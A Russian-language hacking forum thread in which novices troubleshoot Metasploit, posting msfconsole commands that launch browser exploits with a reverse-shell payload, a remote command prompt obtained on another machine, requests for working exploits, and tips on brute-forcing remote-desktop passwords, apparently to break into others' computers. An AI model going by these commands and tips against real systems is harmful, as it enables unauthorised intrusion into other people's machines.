Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    msf > use windows/browser/ms03_020_ie_objecttype
    msf exploit(ms03_020_ie_objecttype) > set SRVHOST 10.10.12.206
    SRVHOST => 10.10.12.206
    msf exploit(ms03_020_ie_objecttype) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(ms03_020_ie_objecttype) > exploit
    [-] Exploit failed: The following options failed to validate: LHOST.
    msf exploit(ms03_020_ie_objecttype) > set LHOST 10.10.12.206
    LHOST => 10.10.12.206
    msf exploit(ms03_020_ie_objecttype) > exploit
    [*] Started reverse handler
    [*] Using URL: http://10.10.12.206:8080/xPB3Ch32qOgpE6s
    [*] Server started.
    [*] Sending exploit to 10.10.12.208:1200...

    что дальше ДЕЛАТЬ??как получить командную строку удолённой машины??
     
  2. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    Люди добрые подскажите спомощья какова сплоита можно командную строку вытащить винда SP2!
     
  3. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Угу, конвертнуть надо в EXE.
    http://short.stop.home.att.net/freesoft/batch2.htm#batcomp

    сессия должна стартануть (напишет в консоли), потом чтоб в неё попасть из консоли, надо набрать sessions -i 1

    Вот https://forum.antichat.ru/showthread.php?t=28601 читайте про версию 3.0 (очень много общего с той что сейчас) и не задавайте лишних вопросов...

    P.S. Модеры снимите закрепление этой статьи плиз... (уже стара, потому как описывает версию 2.7) и замените на эту https://forum.antichat.ru/showthread.php?t=28601 (к примеру) либо эту https://forum.antichat.ru/threadnav38434-2-10.html
     
    #203 -=lebed=-, 16 Dec 2008
    Last edited: 16 Dec 2008
  4. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    -=lebed=- спс тебе всё работает!!!
     
  5. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    C:\>chcp 1251
    chcp 1251
    ??????? ??????? ????????: 1251



    C:\>dir
    dir
    ??? ? ?????????? C ?? ????? ?????.

    ???????? ????? ????: CA4C-CED1



    ?????????? ????? C:\



    30.06.2007 10:40 0 AUTOEXEC.BAT

    15.12.2008 10:47 538 ComartDvrSet.ini

    30.06.2007 10:40 0 CONFIG.SYS

    30.06.2007 10:56 <DIR> Documents and Settings

    12.06.2008 10:05 <DIR> kav

    04.07.2007 15:55 <DIR> My Music

    29.10.2008 11:01 <DIR> Program Files

    24.02.2008 10:11 231?092 sc.log

    30.06.2007 11:00 <DIR> totalcmd

    05.12.2008 09:58 <DIR> WINDOWS

    4 ?????? 231?630 ????

    6 ????? 52?420?149?248 ???? ????????
    КАК нормальную кодировку сделать??
     
  6. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    IPC$ ????????? IPC

    D$ D:\ ??????????? ????? ??????

    F$ F:\ ??????????? ????? ??????

    ADMIN$ C:\WINDOWS ????????? Admin

    C$ C:\ ??????????? ????? ??????

    q$ d:\

    ??????? ????????? ???????.


    подскажите как эти вопросы убрать
     
  7. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    закрась фломастером
     
  8. as3kpwnz

    as3kpwnz Member

    Joined:
    15 Dec 2008
    Messages:
    39
    Likes Received:
    25
    Reputations:
    0
    Сохранить в Юникоде мб? xD
     
  9. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Я так понял, что в MSF 3.2 юзается действительно юникод. А в консоли cmd 866/1251 и т.д. (т.е. однобайтовые кодировки).
     
    #209 -=lebed=-, 18 Dec 2008
    Last edited: 22 Dec 2008
    1 person likes this.
  10. GeForce7

    GeForce7 New Member

    Joined:
    8 Dec 2008
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Решение уже давно существует, стоит тока открыть гугл
     
  11. drdeath

    drdeath Guest

    Reputations:
    0
    Помогите пожалуйсто

    21:12:20 - ms06_067_keyframe [*] Launching exploit windows/browser/ms06_067_keyframe...
    21:12:20 - ms06_067_keyframe [*] Started reverse handler
    21:12:20 - ms06_067_keyframe [*] Using URL: http://192.168.0.102:8080/1
    21:12:20 - ms06_067_keyframe [*] Server started.
    21:12:30 - ms06_067_keyframe [*] Sending Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability to 192.168.0.102:13194...



    а дальше ничего не происходит в чем трабл?
     
  12. drdeath

    drdeath Guest

    Reputations:
    0
    может это по тому что сплойт не пробивает броузер?
     
  13. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Это?
    http://takeworld.blogspot.com/2008/11/metasploit-framework-2.html
     
    1 person likes this.
  14. lEh

    lEh Member

    Joined:
    14 Dec 2008
    Messages:
    11
    Likes Received:
    34
    Reputations:
    0
    ms07-058 естьли с плоит под эту уязвимость??
    ПОДСКАЖИТЕ ктонибуть пару сплоитов актуальных в локалке нетапи не везде проходит!!!
    ЗАРАНИЕ спс!
     
  15. dacus

    dacus Guest

    Reputations:
    0
    Я не давно начал интересоваца етои теме, так что я в етом деле новичок, но очень хочу разабраца во всём ето. Из всего что я читал про взлом компов, я понял что не обоитисй без помоши юзера, то ести необходимо чтоб какимто оброзом ктото, както запустил на атакуемый комп наш exploit, backdoor или трои. А можно както получить доступ без чиито участии?
     
  16. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    dacus например сбрутать удалённый раб стол. Или пасс на радАдмин.
     
  17. Got4A

    Got4A Guest

    Reputations:
    0
    Блин немогу догнать неполучается 3 видео позыпил всеравно недошло конечный результат

    а геде как у вас.


    я так На виртуальном компе пробывал, в сети ппробывал на АДСл провбывал всеравно нет стыковкви с клиентом


    просьба у меня инет девецит пешите мне в ICQ она хоть бесплатноя 259207039
     
  18. Zalp

    Zalp New Member

    Joined:
    3 Mar 2008
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Можно ли, используя Metasploit запустить свой (которого нет в базе Metasploit'а) сплоит?
     
  19. Got4A

    Got4A Guest

    Reputations:
    0
    Я разобрался бугага тока пло что когда делаеш мониторин выходит командноя строка у Неприятеля это сильно портит взлом.

    По вашим стотьям и роликам нефега не получилось. я ношел по лутше

    на 120 % что получится http://takeworld.blogspot.com/search/label/metasploit


    и можна неписать вобще свой IP всерамно Метасплойт сам автоматом ставит
     
  20. -=XXX=-

    -=XXX=- Guest

    Reputations:
    0
    посоветуйте как решить такую проблему:
    в метасплоите, когда выбираешь уязвимость ms08-067
    в списке выбора ОС нет Windows 2003 server (Russian)
    а есть только English.